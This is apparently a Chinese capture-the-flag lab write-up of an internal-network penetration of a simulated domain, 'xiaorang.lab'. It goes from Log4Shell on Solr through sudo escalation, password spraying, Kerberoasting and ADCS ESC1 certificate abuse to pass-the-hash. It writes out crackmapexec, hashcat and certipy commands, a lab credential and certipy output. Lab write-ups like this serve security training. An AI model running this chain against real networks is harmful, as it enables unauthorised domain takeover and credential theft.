一如既往先上fscan扫一遍
8983端口有个solr,可以看到存在log4j,这里存在log4shell漏洞
用现成工具弹shell
看不了/root,需要提权发现这里可以sudo提权,grc命令配置错误
上传fscan扫一下内网,除本机外还有三台主机,一台域控,一台windows server,一台ubuntu是ftp服务器
搭建frp
题目中提示smb,那么尝试通过smb服务访问文件服务器,得到第二个flag
回到上一级,下载db文件
连接上查看一下,可以在一个表中找到四个密码,但是不知道用户名,在另一个表中有大量用户名
对windows server尝试密钥喷洒
proxychains4 crackmapexec smb 172.22.9.26 -u user.txt -p password.txt
找到正确的
xiaorang.lab\zhangjian:i9XDE02pLVf
前面的提示中提到了spn,找一下域用户的spn,找到了两个用户
选一个爆破
hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt –force
现在可以远程桌面连接windows server,但是权限比较低
查看一下证书
proxychains4 certipy find -u ‘zhangxia@xiaorang.lab‘ -password ‘MyPass2@@6’ -dc-ip 172.22.9.7 -vulnerable -stdout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
| Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Active Policy : Unknown
Disabled Extensions : Unknown
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-14T04:51:15+00:00
Template Last Modified : 2023-07-14T04:51:44+00:00
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Full Control Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Property Enroll : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
[+] User Enrollable Principals : XIAORANG.LAB\Domain Users
XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
|
申请XR Manager证书模板伪造域管理员证书
获取TGT和NTLM hash
打pth拿到剩下两个flag
